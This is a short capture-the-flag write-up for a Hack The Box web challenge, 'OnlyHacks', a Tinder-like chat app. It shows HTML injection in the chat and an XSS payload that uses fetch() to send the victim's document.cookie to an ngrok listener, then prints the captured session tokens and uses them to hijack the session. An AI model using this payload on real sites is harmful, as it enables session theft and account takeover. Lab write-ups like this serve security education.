<- WEB

OnlyHacks

2 minutes to read

We have the following website that redirects to a login form:

OnlyHacks 1

Enumeration

We are allowed to register a new account after filling all the fields:

OnlyHacks 2

Once we are in, we see a kind of Tinder app that allows us to match with other people:

OnlyHacks 3

We can match with everyone because, why not? And it looks like Renatta also matched with us!

OnlyHacks 4

Let’s be nice and say “Hi”:

OnlyHacks 5

It looks like he replies very quickly, with a generated text.

Finding XSS

Since we want to compromise the website, let’s see if the chat renders HTML, using <h1>asdf</h1> as a payload:

OnlyHacks 6

Oh, it worked. Maybe we can leverage this HTML injection into a Cross-Site Scripting (XSS) attack. Notice that we have a session cookie:

OnlyHacks 7

Now the objective must be to do XSS on Renatta to grab her cookie and hijack her session to see other chats.

For this, we can use a simple XSS payload and a local Python HTTP server exposed with ngrok:

<img src=x onerror="fetch('https://abcd-12-34-56-78.ngrok-free.app?c='+document.cookie)">

And here we have the cookie!

$ python3 -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...
::1 - - [] "GET /?c=session=eyJ1c2VyIjp7ImlkIjoxLCJ1c2VybmFtZSI6IlJlbmF0YSJ9fQ.Z7YwXg.1ztGvcaBidMWWe2j_naqurzosFQ HTTP/1.1" 200 -
::1 - - [] "GET /?c=session=eyJ1c2VyIjp7ImlkIjoxLCJ1c2VybmFtZSI6IlJlbmF0YSJ9fQ.Z7YwXg.1ztGvcaBidMWWe2j_naqurzosFQ HTTP/1.1" 200 -
::1 - - [] "GET /?c=session=eyJ1c2VyIjp7ImlkIjo1LCJ1c2VybmFtZSI6ImFzZGYifX0.Z7YxFw.mFDCvLas_9EHC-zVD7ZvZKJnaPA HTTP/1.1" 200 -
::1 - - [] "GET /?c=session=eyJ1c2VyIjp7ImlkIjo1LCJ1c2VybmFtZSI6ImFzZGYifX0.Z7YxFw.mFDCvLas_9EHC-zVD7ZvZKJnaPA HTTP/1.1" 200 -

Flag

Now, we can change our session cookie and access Renatta’s chats:

OnlyHacks 8

And here we have the flag:

HTB{d0nt_trust_str4ng3r5_bl1ndly}